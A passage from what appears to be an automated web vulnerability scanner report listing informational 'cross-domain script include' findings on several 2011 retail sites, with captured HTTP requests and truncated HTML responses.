Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=vLQsNQBSZphCcjtDjLwwTnfpkzNq3J0JlY9vd1F9mv7FzdpT4zqh!-1418241072; browser_id=125602208394; __g_c=w%3A0; __utmz=185450681.1305510171.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=185450681.2052200100.1305510171.1305510171.1305510171.1; __utmc=185450681; __utmb=185450681.1.10.1305510171; s_pers=%20s_nr%3D1305510172030%7C1308102172030%3B%20s_lastvisit%3D1305510172069%7C1400118172069%3B%20gpv_p27%3DHome%2520Page%7C1305511972080%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; fsr.session={"v":1,"rid":"1305510186434_570135","pv":1,"to":3,"c":"http://www.acehardware.com/home/index.jsp","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:36 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 107905

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview Tim
...[SNIP]...
</SCRIPT>
   <SCRIPT LANGUAGE="JavaScript" type="text/javascript" src="http://ACE.imageg.net/js/gomez-gtagb4_noobj.js"></SCRIPT>
...[SNIP]...
</SCRIPT>
   <SCRIPT LANGUAGE="JavaScript" type="text/javascript" src="http://ACE.imageg.net/js/gomez-gtagb4_noobj.js"></SCRIPT>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ACE.imageg.net/css/PG_ACE_home.css" />-->
   <script type="text/javascript" src="http://ACE.imageg.net/include/flashobject.js"></script>
<script type="text/javascript" src="http://ACE.imageg.net/include/swfobject.js"></script>

   <script type="text/javascript" src="http://ACE.imageg.net/js/DF_main.js"></script>
   <script type="text/javascript" src="http://ACE.imageg.net/js/WIZ_topNav.js"></script>
   <script type="text/javascript" src="http://ACE.imageg.net/include/infozone.js"></script>
...[SNIP]...
<!-- End of DoubleClick Spotlight Tag: Please do not remove-->
<script type="text/javascript" src="http://ACE.imageg.net/js/WIZ_TempTizzy.js"></script>
...[SNIP]...
<div id="siteBg">

       
                           <script type="text/javascript" src="http://ACE.imageg.net/pwr/engine/js/full.js"></script>
...[SNIP]...
<!-- Start Email Signup -->
<script type="text/javascript" src="http://ACE.imageg.net/js/PG_ACE_emailSignupToggle.js"></script>
...[SNIP]...
<!-- begin additions for minicart -->
<script type="text/javascript" src="http://ACE.imageg.net/include/minicart.js"></script>
...[SNIP]...
</div>

               
                               <script type="text/javascript" src="http://ACE.imageg.net/include/tabset_home.js"></script>
               
               <script type="text/javascript" src="http://ACE.imageg.net/include/tabset.js"></script>
...[SNIP]...
</script>
<script language='javascript' src='https://dsa.csdata1.com/data/js/9027093/csgather.js'></script>
...[SNIP]...
<!--You are running on ashprd2_ws_46_6-->


<script src="http://media.gsimedia.net/tg/gsiutt/store133.js"></script>
...[SNIP]...

18.17. https://www.acehardware.com/checkout/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.acehardware.com
Path:   /checkout/index.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /checkout/index.jsp?process=login HTTP/1.1
Host: www.acehardware.com
Connection: keep-alive
Referer: http://www.acehardware.com/home/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=vLQsNQBSZphCcjtDjLwwTnfpkzNq3J0JlY9vd1F9mv7FzdpT4zqh!-1418241072; browser_id=125602208394; __g_c=w%3A0; __utmz=185450681.1305510171.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=185450681.2052200100.1305510171.1305510171.1305510171.1; __utmc=185450681; __utmb=185450681.2.10.1305510171; fsr.session={"v":1,"rid":"1305510186434_570135","pv":2,"to":5,"c":"http://www.acehardware.com/home/index.jsp","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305510830898}; s_pers=%20s_lastvisit%3D1305510172069%7C1400118172069%3B%20s_nr%3D1305511345979%7C1308103345979%3B%20gpv_p27%3DHome%2520Page%7C1305513145986%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicace%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//www.acehardware.com/coreg/index.jsp%2525253Fstep%2525253Dregister%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:12:40 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 95809

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview Time
...[SNIP]...
</script>
<script language='javascript' src='https://dsa.csdata1.com/data/js/9027093/csgather.js'></script>
...[SNIP]...
<!--You are running on ashprd2_ws_46_6-->


<script src="https://media.gsimedia.net/tg/gsiutt/store133.js"></script>
...[SNIP]...

18.18. http://www.armaniexchange.com/category/womens.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.armaniexchange.com
Path:   /category/womens.do

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /category/womens.do HTTP/1.1
Host: www.armaniexchange.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=iuoJJxDKPc84a1dE2-; mbcc=736A768E-F798-53C9-B056-8FE338824CC8; customer=none; basket=none; s_cc=true; gpv_p4l=Womens; s_sq=%5B%5BB%5D%5D; mbcs=6451B347-829F-5F10-0394-7AA048201BB1; fsr.s={"v":1,"rid":"1305510204631_768485","to":3,"c":"http://www.armaniexchange.com/category/womens.do","pv":2,"lc":{"d0":{"v":2,"s":true}},"cd":0,"sd":0}

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Expires: Mon, 16 May 2011 01:55:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:55:22 GMT
Connection: close
Set-Cookie: customer=none; path=/; expires=Wed, 29-May-2013 01:55:21 GMT
Set-Cookie: basket=none; path=/; expires=Mon, 30-May-2011 01:55:21 GMT
Content-Length: 72933


    <script language="JavaScript">
// Disable edit cell tab.
parent.editCell.
...[SNIP]...
<link
href="http://t.p.mybuys.com/css/mbstyles.css"
type="text/css"
rel="stylesheet"
id="mybuysstyles">
<script
type="text/javascript"
src="http://t.p.mybuys.com/js/mybuys3.js">

</script>
<script
type="text/javascript"
src="http://t.p.mybuys.com/clients/ARMANIEXCHANGE/js/setup.js">

</script>
...[SNIP]...

18.19. http://www.bhphotovideo.com/c/browse/Underwater-Equipment/ci/11585/N/4294551294

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bhphotovideo.com
Path:   /c/browse/Underwater-Equipment/ci/11585/N/4294551294

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /c/browse/Underwater-Equipment/ci/11585/N/4294551294 HTTP/1.1
Host: www.bhphotovideo.com
Proxy-Connection: keep-alive
Referer: http://www.bhphotovideo.com/bnh/controller/home?KW=BANNER2&img=bh_wl.gif
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0pnRNQQMwR!-112699937; cookieID=18154535221305509932941; cmTPSet=Y; TS29f0cc=7f329831c9f74bab89d73187e3b1cfd8871d7ea6dc67d58e4dd0837960ac0ec5a2f86729b092ce85bc587bdd; cmRS=&t1=1305510783215&t2=1305510792033&t3=1305541011993&t4=1305510778300&lti=1305541011993&ln=Underwater&hr=/c/browse/Underwater-Equipment/ci/11585/N/4294551294&fti=&fn=searchForm%3A0%3BNwsLtrSgnUp_Subscribe%3A1%3B&ac=&fd=&uer=&fu=&pi=RootPage.jsp&ho=server.bhphotovideo.com/cm%3F&ci=90132819

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Cache-Control: no-cache="set-cookie"
Content-Type: text/html; charset=ISO-8859-1
X-Powered-By: Servlet/2.5 JSP/2.1
X-UA-Compatible: IE=EmulateIE7
Date: Mon, 16 May 2011 10:16:53 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=2STpNQ5TWC!-112699937; domain=bhphotovideo.com; path=/
Set-Cookie: TS29f0cc=c688b8f92f50d9b7e80f755703dbb3d6871d7ea6dc67d58e4dd0f99460ac0ec5f5b84ed0b092ce85bc587bdd; Path=/
Content-Length: 37549

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
<!--<meta http-equiv
...[SNIP]...
</a> -->
           <script type='text/javascript' src='http://static.feedroom.com/affiliate/_common/js/fr_embed.js'></script>
...[SNIP]...

18.20. http://www.bluefly.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bluefly.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.bluefly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSLB=1; SSID=AwCK-CkAAAAA6YPQTRybEAHpg9BNAQDpg9BNAAAAAAAAAADpg9BNAQA6AAAAWwQAAAI; SSSC=1.G5607126572844751644.1.58.1115; SSRT=6YPQTQA; SSOD=AGHw_gAA

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:31 GMT
Set-Cookie: SSLB=1; path=/; domain=.bluefly.com
Set-Cookie: SSRT=e4XQTQE; path=/; domain=.bluefly.com; expires=Tue, 15-May-2012 02:01:31 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP06 (build: SVNTag=JBPAPP_4_3_0_GA_CP06 date=200907141446)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yLERDUy1DU1IvOS4yLFNlcnZpY2UvOS4yLENBRi85LjIgWyBEUFNMaWNlbnNlLzAgQjJDTGljZW5zZS8wICBd
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Expires: Fri, 01 Oct 2010 19:42:13 GMT
Pragma: no-cache
Set-Cookie: TLTHID=6B1BA5627F60107F23AEA0F517B78A48; Path=/; Domain=.bluefly.com
Set-Cookie: TLTSID=6B1BA5627F60107F23AEA0F517B78A48; Path=/; Domain=.bluefly.com
Set-Cookie: JSESSIONID=uhf1oJlXUcjz8j8R-h2xrg**.bluefly_node12; Path=/
Set-Cookie: _714bc2c9=guest; Expires=Tue, 15-May-2012 02:01:31 GMT; Path=/
Set-Cookie: CS_TRACKER_ID=uhf1oJlXUcjz8j8R-h2xrg**.bluefly_node12; Expires=Sat, 03-Jun-2079 05:15:38 GMT
RTSS: 1
Set-Cookie: TS18d374=e7c2bf9d5c17e0294f3546cf4c9ad3fb60874fe9f20602d14dd0857b; Path=/
Content-Length: 43592


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="ht
...[SNIP]...
<!-- Begin Mercent Track Code -->
<script src="http://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

18.21. http://www.bluenile.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bluenile.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.bluenile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:03:04 GMT
Content-Type: text/html;charset=UTF-8
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
X-Powered-By: ASP.NET
Set-Cookie: bnper=ver~3; Domain=.bluenile.com; Expires=Thu, 13-May-2021 02:03:01 GMT; Path=/
Set-Cookie: bnper=CONTEXT-NAME~53&ver~3; Domain=.bluenile.com; Expires=Thu, 13-May-2021 02:03:01 GMT; Path=/
Set-Cookie: bnper=CONTEXT-NAME~53&CURR~USD&ver~3; Domain=.bluenile.com; Expires=Thu, 13-May-2021 02:03:01 GMT; Path=/
Set-Cookie: bnper=CONTEXT-NAME~53&CURR~USD&ver~3&CURR_SYM~%24; Domain=.bluenile.com; Expires=Thu, 13-May-2021 02:03:01 GMT; Path=/
Set-Cookie: GUID=C1D03AAB_3A5C_4245_82B9_9C5170C3BA74; Domain=.bluenile.com; Expires=Thu, 22-Jan-2043 03:49:41 GMT; Path=/
Set-Cookie: bnper=NIB~0&CONTEXT-NAME~53&ver~3&CURR~USD&CURR_SYM~%24; Domain=.bluenile.com; Expires=Thu, 13-May-2021 02:03:01 GMT; Path=/
Set-Cookie: bnses=ver~1; Domain=.bluenile.com; Path=/
Set-Cookie: bnses=new~true&ver~1; Domain=.bluenile.com; Path=/
Set-Cookie: stc=3NZ93G; Domain=.bluenile.com; Expires=Sat, 12-Nov-2011 02:03:01 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 105239


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.or
...[SNIP]...
</div>
<script src="http://connect.facebook.net/en_US/all.js"></script>
...[SNIP]...

18.22. http://www.bluenile.com/build-your-own-diamond-ring

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bluenile.com
Path:   /build-your-own-diamond-ring

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /build-your-own-diamond-ring?first_step=diamond&forceStep=DIAMONDS_STEP&track=more HTTP/1.1
Host: www.bluenile.com
Proxy-Connection: keep-alive
Referer: http://www.bluenile.com/engagement-rings?track=head
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; sitetrack=jse~1; bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; pop=sweeps~1; bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~1&mbpop~false; bncust=ver~1&SignInURL~http%3A%2F%2Fwww.bluenile.com%2F; __utmz=1.1305541144.2.2.utmcsr=bluenile.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.637722072.1305510928.1305510928.1305541144.2; __utmc=1; __utmb=1.2.10.1305541144; testcookie=; stc=3NZR3Q

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Date: Mon, 16 May 2011 10:36:20 GMT
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Expires: Wed, 31 Dec 1969 23:59:59 GMT
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
Set-Cookie: dsearch=ver~4&visibleBYOR~800000000&stateBYOR~RD-23-1567-------319.0-1558631.0-----------0------0%2C0%2C0-price-asc-USD--2%2C3%2C4%2C5%2C6-; Domain=.bluenile.com; Expires=Wed, 15-May-2013 10:36:16 GMT; Path=/
Set-Cookie: stc=3NZR3Q; Domain=.bluenile.com; Expires=Sat, 12-Nov-2011 10:36:16 GMT; Path=/
Set-Cookie: bld=ver~3&BYOR~DIAMONDS_STEP-DIAMONDS_STEP-0---; Domain=.bluenile.com; Expires=Wed, 15-May-2013 10:36:16 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 220209

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns
...[SNIP]...
</div>
<script src="http://connect.facebook.net/en_US/all.js"></script>
...[SNIP]...

18.23. http://www.bluenile.com/engagement-rings

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bluenile.com
Path:   /engagement-rings

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /engagement-rings?track=head HTTP/1.1
Host: www.bluenile.com
Proxy-Connection: keep-alive
Referer: http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qlZ9Vfw8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; sitetrack=jse~1; bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; pop=sweeps~1; bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~1&mbpop~false; bncust=ver~1&SignInURL~http%3A%2F%2Fwww.bluenile.com%2F; stc=3NZR3Q; testcookie=; __utmz=1.1305541144.2.2.utmcsr=bluenile.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.637722072.1305510928.1305510928.1305541144.2; __utmc=1; __utmb=1.1.10.1305541144

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:34:26 GMT
Content-Type: text/html;charset=UTF-8
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
Vary: Accept-Encoding
Content-Length: 76503


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="htt
...[SNIP]...
</div>
<script src="http://connect.facebook.net/en_US/all.js"></script>
...[SNIP]...

18.24. http://www.brookstone.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.brookstone.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.brookstone.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Accelerator-Vary: Accept-Encoding
Cache-Control: public, max-age=10800
Expires: Mon, 16 May 2011 05:02:49 GMT
Set-Cookie: JSESSIONID=A7CBB8B14AF4D3D7C9E71E4E03DC5C7B; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 02:02:50 GMT
Set-Cookie: TS657dfa=4cb6f2f3222314ecede9aa2b629210ff8800c36175680b534dd085c960ac0ec5d3282da8; Path=/
Content-Length: 75023


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="EN">
<!-- Generated by
...[SNIP]...
</script>
<script language="JavaScript" type="text/javascript" src="https://cts-secure.channelintelligence.com/1272812728_landing.js"></script>
...[SNIP]...

18.25. http://www.brookstone.com/floating-daybed-with-canopy-pool-lounger.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.brookstone.com
Path:   /floating-daybed-with-canopy-pool-lounger.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /floating-daybed-with-canopy-pool-lounger.html?bkiid=subCategoryLandingPage_home_beanbag_chairs_kids|C1TopProducts1FDT|11370241 HTTP/1.1
Host: www.brookstone.com
Proxy-Connection: keep-alive
Referer: http://www.brookstone.com/outdoor-and-patio-furniture_Outdoor-Wood-Furniture.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E841FF051D3756-4000010C200DDEB1[CE]; JSESSIONID=B4E0235D8822C4DE7BE6C831C54E4E62; TS657dfa=f5d54e710c8ae3d5dcd77d6f57bcade2e754034066e5db8e4dd0fb6760ac0ec56e0e0800; s_pers=%20s_nr%3D1305511115723%7C1368583115723%3B%20s_lv%3D1305511115727%7C1400119115727%3B%20s_lv_s%3DFirst%2520Visit%7C1305512915727%3B%20s_vs%3D1%7C1305543287875%3B; s_sess=%20s_evar2%3Dworldlandingpage_outdoor_living%257Ccxtopnav1fdt%257Coutdoor_living%3B%20s_cc%3Dtrue%3B%20s_sq%3Dbstoneprod%253D%252526pid%25253Doutdoor%25252520living%2525253Aoutdoor%25252520%25252526amp%2525253B%25252520patio%25252520furniture%2525253Aoutdoor%25252520wood%25252520furniture%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.brookstone.com/floating-daybed-with-canopy-pool-lounger.html%2525253Fbkiid%2525253DsubCategoryLandingPage%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
X-Accelerator-Vary: Accept-Encoding
Cache-Control: public, max-age=10800
Expires: Mon, 16 May 2011 13:35:49 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:35:48 GMT
Set-Cookie: TS657dfa=3e167d73b2313d63b52b8915c1fc32dbe754034066e5db8e4dd0fe0560ac0ec56e0e0800; Path=/
Content-Length: 102983


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="EN">
<!-- Generated by
...[SNIP]...
</script>
<script language="JavaScript" type="text/javascript" src="https://cts-secure.channelintelligence.com/1272812728_landing.js"></script>
...[SNIP]...

18.26. http://www.brookstone.com/outdoor-and-patio-furniture_Outdoor-Wood-Furniture.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.brookstone.com
Path:   /outdoor-and-patio-furniture_Outdoor-Wood-Furniture.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /outdoor-and-patio-furniture_Outdoor-Wood-Furniture.html HTTP/1.1
Host: www.brookstone.com
Proxy-Connection: keep-alive
Referer: http://www.brookstone.com/outdoor-living.html?bkiid=worldLandingPage_outdoor_living|CXTopNav1FDT|outdoor_living
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=CD578D91A4C7B4E1296267339AF6F2A2; TS657dfa=839bad1e649fb9545c4c97dd9c18439ee754034066e5db8e4dd083f960ac0ec57d901b7a; s_vi=[CS]v1|26E841FF051D3756-4000010C200DDEB1[CE]; s_pers=%20s_nr%3D1305511115723%7C1368583115723%3B%20s_lv%3D1305511115727%7C1400119115727%3B%20s_lv_s%3DFirst%2520Visit%7C1305512915727%3B%20s_vs%3D1%7C1305543278247%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3Dworldlandingpage_outdoor_living%257Ccxtopnav1fdt%257Coutdoor_living%3B%20s_sq%3Dbstoneprod%253D%252526pid%25253Doutdoor%25252520living%2525253Ahome%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.brookstone.com/outdoor-and-patio-furniture_Outdoor-Wood-Furniture.html_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B

Response

HTTP/1.1 200 OK
X-Accelerator-Vary: Accept-Encoding
Cache-Control: public, max-age=10800
Expires: Mon, 16 May 2011 13:35:41 GMT
Set-Cookie: JSESSIONID=F1D08AEDE471B4630D873CF1AA19CFA3; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:35:41 GMT
Set-Cookie: TS657dfa=ae893fcd6f83db1d4dcea9b7b38a4764e754034066e5db8e4dd0fdfd60ac0ec569d69bc7; Path=/
Content-Length: 143902


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="EN">
<!-- Generated by
...[SNIP]...
</script>
<script language="JavaScript" type="text/javascript" src="https://cts-secure.channelintelligence.com/1272812728_landing.js"></script>
...[SNIP]...

18.27. http://www.brookstone.com/outdoor-living.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.brookstone.com
Path:   /outdoor-living.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /outdoor-living.html?bkiid=worldLandingPage_outdoor_living|CXTopNav1FDT|outdoor_living HTTP/1.1
Host: www.brookstone.com
Proxy-Connection: keep-alive
Referer: http://www.brookstone.com/outdoor-living.html?bkiid=homePage|CXTopNav1FDT|outdoor_living
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
